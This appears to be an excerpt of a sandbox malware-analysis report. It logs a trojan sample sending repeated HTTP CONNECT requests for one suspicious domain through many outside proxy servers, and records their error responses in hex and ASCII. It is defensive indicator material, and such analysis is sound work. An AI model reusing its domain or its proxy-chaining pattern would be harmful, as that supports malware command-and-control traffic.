                                                                                1717192.168.2.85391179.137.204.161138925828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.991292000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.065707922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.085875988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1718192.168.2.855016104.22.1.113805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.991462946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.081897020 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1719192.168.2.853982161.97.147.19328385828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.991518021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.992055893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.992099047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1720192.168.2.85502367.205.132.249805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.995263100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.084399939 CET343INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 182
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1721192.168.2.85401195.217.187.170452385828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.011734009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1722192.168.2.85393114.47.70.13780805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.015425920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1723192.168.2.854771172.93.111.87443745828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.015618086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.065764904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.085875034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1724192.168.2.85474151.158.124.167163795828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.033977032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.104424000 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1725192.168.2.853929103.96.38.161805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.047487974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1726192.168.2.854975161.97.170.209305295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.081101894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.695013046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.382965088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.789133072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.694967031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1727192.168.2.855032192.252.216.8141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.081129074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1728192.168.2.855010193.151.90.85169065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.082715034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.694897890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.382656097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.492213011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.679435968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.788773060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1729192.168.2.85498431.43.33.5541535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.083060980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1730192.168.2.85501995.111.227.164628525828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.086057901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1731192.168.2.854738129.213.52.12431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.113692999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.195199013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.195385933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:52.194737911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:04.194742918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1732192.168.2.854973175.183.82.22181935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.115551949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1733192.168.2.85503945.196.148.854325828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.115699053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.224174023 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Content-Length: 65
                                                                                Proxy-Authenticate: Basic realm="Proxy"
                                                                                Connection: close
                                                                                Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1734192.168.2.85437165.38.21.103805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.125153065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.625660896 CET872INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Server: Apache/2.4.26 (Win32) OpenSSL/1.0.2l PHP/5.6.31
                                                                                Vary: accept-language,accept-charset,Accept-Encoding
                                                                                Accept-Ranges: bytes
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Language: en
                                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 53 65 72 76 65 72 20 65 72 72 6f 72 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 70 6f 73 74 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 65 72 72 6f 72 21
                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Server error!</title><link rev="made" href="mailto:postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Server error!
                                                                                Feb 23, 2024 14:28:43.625698090 CET524INData Raw: 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 61 6e 64 20 77 61 73 20 0d 0a 20 20 20 20 75
                                                                                Data Ascii: </h1><p> The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there was an error in a CGI script. </p><p>If you think this is a server err


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1735192.168.2.851559147.124.212.31518255828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.125544071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.194986105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.195087910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:52.194766045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:04.194719076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:16.225980997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1736192.168.2.853657117.160.250.13188995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.216536045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.492471933 CET303INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                Feb 23, 2024 14:28:45.508358955 CET303INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1737192.168.2.85478137.187.135.60184725828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.216830015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1738192.168.2.85436572.217.158.20241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.216919899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1739192.168.2.85500452.172.1.186805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.235930920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1740192.168.2.855038151.80.136.13831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
